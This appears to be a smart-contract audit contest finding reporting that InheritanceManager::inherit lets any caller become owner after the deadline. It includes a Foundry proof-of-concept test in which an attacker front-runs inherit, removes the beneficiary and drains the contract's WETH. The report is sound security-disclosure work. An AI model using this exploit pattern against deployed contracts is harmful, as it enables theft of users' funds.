Inheritable Smart Contract Wallet
First Flight #35
Beginner FriendlySolidity
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

[H-1] InheritanceManager::inherit can be front-run by anyone

0xnick

Summary

The goal of the function is to set the state variable isInherited as true. A special case is when the beneficiaries is an array with a single element.

This will set the owner of the contract as the msg.sender which is an arbitrary address.

Vulnerability Details

Likelihood: High. Easily exploitable once the deadline passes, requiring only transaction ordering (common in Ethereum).

The test creates an attacker EOA, it front-runs any transaction when deadline has passed, removes the only beneficiary or can directly withdraw the ERC-20 or ETH.

function test_canFrontrunInherit() public {
address attacker = makeAddr("attacker");
vm.warp(1);
vm.deal(attacker, 1e18);
weth.mint(address(im), 100e18);
vm.startPrank(owner);
im.addBeneficiery(user1);
vm.stopPrank();
vm.warp(1 + 90 days);
vm.startPrank(attacker);
im.inherit();
im.removeBeneficiary(user1);
im.sendERC20(address(weth), weth.balanceOf(address(im)), address(attacker));
vm.stopPrank();
assertEq(weth.balanceOf(address(im)), 0);
assertEq(weth.balanceOf(address(attacker)), 100e18);
}

Impact

High. All funds at risk as the attacker can inherit, remove all beneficiaries and claim all funds.

Tools Used

  • Manual Review

Recommendations

Allow only beneficiaries to call inherit, it will not prevent the risk of a malicious beneficiary, but it will narrow down the possibilities.

Updates

Lead Judging Commences

0xtimefliez Lead Judge 5 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Inherit depends on msg.sender so anyone can claim the contract

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.